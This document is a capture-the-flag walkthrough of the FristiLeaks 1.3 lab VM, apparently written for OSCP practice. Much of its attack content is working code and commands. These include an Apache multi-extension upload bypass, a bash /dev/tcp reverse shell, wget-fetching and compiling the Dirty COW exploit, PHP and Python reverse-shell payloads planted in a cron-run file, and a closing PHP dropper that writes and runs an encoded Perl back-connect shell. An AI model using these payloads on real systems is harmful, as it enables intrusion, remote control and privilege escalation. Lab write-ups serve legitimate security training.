FristiLeaks_1.3
OSCP prep, OSCP series: the FristiLeaks_1.3 lab
FristiLeaks_1.3 is rated an easy box.
It tests information gathering and has a bit of a CTF flavour; following the hints eventually leads to the upload location.
The Apache parsing flaw is used to bypass the upload whitelist.
Finally, Dirty COW is used for privilege escalation.
Download:
https://pan.quark.cn/s/26e1cb6958fc
nmap
Host discovery
└─# nmap -sn 192.168.80.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:22 CST
Nmap scan report for 192.168.80.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.2
Host is up (0.00030s latency).
MAC Address: 00:50:56:E1:35:E6 (VMware)
Nmap scan report for 192.168.80.131
Host is up (0.00052s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.80.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:FF:44:91 (VMware)
Nmap scan report for 192.168.80.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 25.04 seconds
Port scan
Two full-range scans were run; only port 80 is open.
┌──(root㉿kali)-[/home/kali/桌面/nmap]
└─# nmap --min-rate 10000 -p- 192.168.80.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:25 CST
Nmap scan report for 192.168.80.131
Host is up (0.00085s latency).
Not shown: 65515 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 23.66 seconds
┌──(root㉿kali)-[/home/kali/桌面/nmap]
└─# nmap --min-rate 5000 -p- 192.168.80.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:28 CST
Nmap scan report for 192.168.80.131
Host is up (0.0014s latency).
Not shown: 65502 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 36.53 seconds
Detailed port scan
└─# nmap -sV -sC -sT -O -p80 192.168.80.131 -oA fl1.3/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:45 CST
Nmap scan report for 192.168.80.131
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
| http-methods:
|_ Potentially risky methods: TRACE
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1
closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology
DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39
(94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8
(91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds
vuln script scan
└─# nmap --script=vuln -p80 192.168.80.131 -oA fl1.3/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:47 CST
Nmap scan report for 192.168.80.131
Host is up (0.00087s latency).
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /robots.txt: Robots file
| /icons/: Potentially interesting folder w/ directory listing
|_ /images/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 108.07 seconds
Directory scan
nmap and the directory scan turned up:
/robots.txt
/icons/
/images/
Port 80
robots.txt
It lists three directories; let's look at each.
Disallow: /cola
Disallow: /sisi
Disallow: /beer
The images folder has directory listing enabled, but there is nothing useful in it.
The other two entries point to the same content as /cola.
/icons directory
It also has directory listing, but it is all images; nothing there.
Ran a separate directory scan against it; again only images.
Hint
Something looked off, so I tried the lowercase name fristi, and it was accessible.
File upload vulnerability
Log in following the hint
Once on the login page, I also tried weak passwords and SQL injection along the way; neither worked.
Viewing the page source reveals a hint:
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
Base64-decoding it shows it is an image,
which contains:
keKkeKKeKKeKkEkkEk
With these two values:
eezeepz
keKkeKKeKKeKkEkkEk
they look like a username and password.
Login succeeded.
A file upload is found.
File upload
Tried uploading a file; the upload is restricted by a whitelist.
Check the PHP version and the web server.
Two things are worth trying: %00 truncation and the Apache parsing flaw.
%00 truncation
Prerequisites:
1. PHP version lower than 5.3.4
2. magic_quotes_gpc set to Off in php.ini
Apache parsing flaw
Apache 1.x and 2.x have a multi-extension parsing flaw.
For example, with an address of the form:
www.xxxx.com/apache.php.bbb.aaa
the suffixes are evaluated from right to left: if aaa is not a recognised suffix, bbb is checked next, and so on until a recognised suffix is found; that suffix is then used for parsing. The address above is therefore handled as a request for apache.php.
Tried %00 truncation: failed.
Tried the Apache parsing flaw: succeeded.
AntSword connection + reverse shell
Reverse shell
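As an added illustration (not the box's code; the handler mapping, whitelist and function names are assumptions), this models why a last-extension whitelist fails against Apache's multi-extension handling. It uses mod_mime's general rule, where each recognised suffix contributes on its own and unknown suffixes are ignored, which covers the apache.php.bbb.aaa case above and also names like shell.php.png, and it finishes with the stricter check and server-side naming a defender would use instead.

```python
import secrets

# Assumed server config, modelled on the target's Apache/PHP stack:
# "AddHandler php5-script .php" plus the usual image/text types.
HANDLERS = {"php": "php5-script"}
TYPES = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png",
         "gif": "image/gif", "html": "text/html", "txt": "text/plain"}
ALLOWED = {"jpg", "jpeg", "png", "gif"}          # the upload whitelist


def mod_mime_resolve(filename):
    """Return (handler, content_type) the way mod_mime assigns them: each
    dot-separated suffix is looked up independently, a recognised one sets
    its attribute, and unknown suffixes such as .bbb or .aaa are ignored.
    The handler set by .php therefore survives any later suffix."""
    handler = ctype = None
    for ext in filename.lower().split(".")[1:]:
        if ext in HANDLERS:
            handler = HANDLERS[ext]
        elif ext in TYPES:
            ctype = TYPES[ext]
    return handler, ctype


def would_run_as_php(filename):
    return mod_mime_resolve(filename)[0] == "php5-script"


def last_extension_whitelist(filename):
    """The weak check: only the final suffix is compared with the whitelist."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def strict_upload_check(filename):
    """Hardened check: exactly one suffix, and it must be whitelisted, so
    names such as shell.php.png or apache.php.bbb.aaa are rejected."""
    base, dot, ext = filename.lower().rpartition(".")
    return dot == "." and base != "" and "." not in base and ext in ALLOWED


def stored_name(filename):
    """Never keep the client's name: store under a random name plus the
    verified suffix (and serve uploads from a directory with PHP disabled)."""
    if not strict_upload_check(filename):
        raise ValueError("upload rejected: " + filename)
    return secrets.token_hex(8) + "." + filename.lower().rpartition(".")[2]
```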
bash -c 'exec bash -i &>/dev/tcp/192.168.80.129/7777 <&1'
Method one: Dirty COW privilege escalation
Check the kernel version
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64
Dirty COW can be attempted.
wget http://192.168.80.129/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod 777 dirty
./dirty 123456
It worked; switch user directly with su.
bash-4.1$ su firefart
su firefart
Password: 123456
[firefart@localhost tmp]# id
id
uid=0(firefart) gid=0(root) groups=0(root)
[firefart@localhost tmp]#
Method two: sudo privilege escalation, following the box's hints
Going to the home directory, we find the user we logged in as, eezeepz.
Inside it there is a .txt file containing a hint:
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
In short: create a file called runthis under /tmp/, and the admin user will run the commands in it every minute, so it can be used to get a reverse shell.
Only commands under /usr/bin may be used, so first check which ones are usable; both python and php are present.
<?php
// PHP option: connect back to the listener; the socket becomes file descriptor 3,
// which the interactive shell then uses for stdin, stdout and stderr.
$sock = fsockopen("192.168.80.129", 6666);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
Create shell.py and pull it onto the target with wget.
# Python option: connect back to the listener and attach a pty shell to the socket.
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.80.129",6666));
# Redirect stdin, stdout and stderr to the socket.
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")
Then write the command into runthis and wait a minute for the reverse shell.
echo "/usr/bin/python /tmp/shell.py" > runthis
Once it succeeds, the next hint appears.
An encryption script and encrypted strings are found.
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
# Python 2 script as found on the box: base64-encode, reverse, then rot13.
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print(cryptoResult)
Encrypted strings
[admin@localhost ~]$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
[admin@localhost ~]$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
Reverse the steps of the encryption script to get a decoder:
#decoderot13.py
# Undo the steps in reverse order: rot13, reverse, then base64-decode.
import base64,codecs,sys
def decodeString(str):
    base64string= codecs.decode(str,'rot13')
    return base64.b64decode(base64string[::-1])
cryptoResult=decodeString(sys.argv[1])
print(cryptoResult)
Decrypt
mVGZ3O3omkJLmy2pcuTq : thisisalsopw123
=RFn0AKnlMHMPIzpyuTI0ITG : LetThereBeFristi!
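A Python 3 re-implementation of the encode/decode pair as an added check (not the box's script; the function names are mine): it shows the scheme is a reversible base64, reverse, rot13 transform rather than encryption, and verifies that both strings from the box round-trip.

```python
import base64
import codecs


def encode_string(plain: str) -> str:
    """Same steps as the box's encodeString: base64 -> reverse -> rot13."""
    b64 = base64.b64encode(plain.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(cipher: str) -> str:
    """Inverse: rot13 -> reverse -> base64-decode. rot13 is its own inverse
    and leaves digits and '=' padding untouched, so the reversed padding
    character at the front of a ciphertext is expected."""
    b64 = codecs.decode(cipher, "rot13")[::-1]
    return base64.b64decode(b64).decode()


# The two values read from cryptedpass.txt and whoisyourgodnow.txt on the box.
SAMPLES = {
    "mVGZ3O3omkJLmy2pcuTq": "thisisalsopw123",
    "=RFn0AKnlMHMPIzpyuTI0ITG": "LetThereBeFristi!",
}


def check_round_trip() -> bool:
    """True if every sample decodes to its plaintext and re-encodes exactly;
    anyone holding the script can recover the stored 'passwords'."""
    return all(decode_string(c) == p and encode_string(p) == c
               for c, p in SAMPLES.items())


if __name__ == "__main__":
    for c, p in SAMPLES.items():
        print(c, ":", decode_string(c))
    print("round trip ok:", check_round_trip())
```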
Guessed this is fristigod's password.
su fristigod
<?php
// Helper that writes a Perl back-connect script to /tmp/.bc and runs it;
// $yourip and $yourport must be filled in before use.
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}
function execute($cfe) {
    // Try each available command-execution function in turn.
    $res = '';
    if ($cfe) {
        if(function_exists('exec')) {
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif(function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif(function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif(@is_resource($f = @popen($cfe,"r"))) {
            $res = '';
            while(!@feof($f)) {
                $res .= @fread($f,1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
function cf($fname,$text){
    // Write the base64-decoded payload to $fname.
    if($fp=@fopen($fname,'w')) {
        @fputs($fp,@base64_decode($text));
        @fclose($fp);
    }
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2V
jaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNC
iRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8
IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkV
BTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcG
VuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc
3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>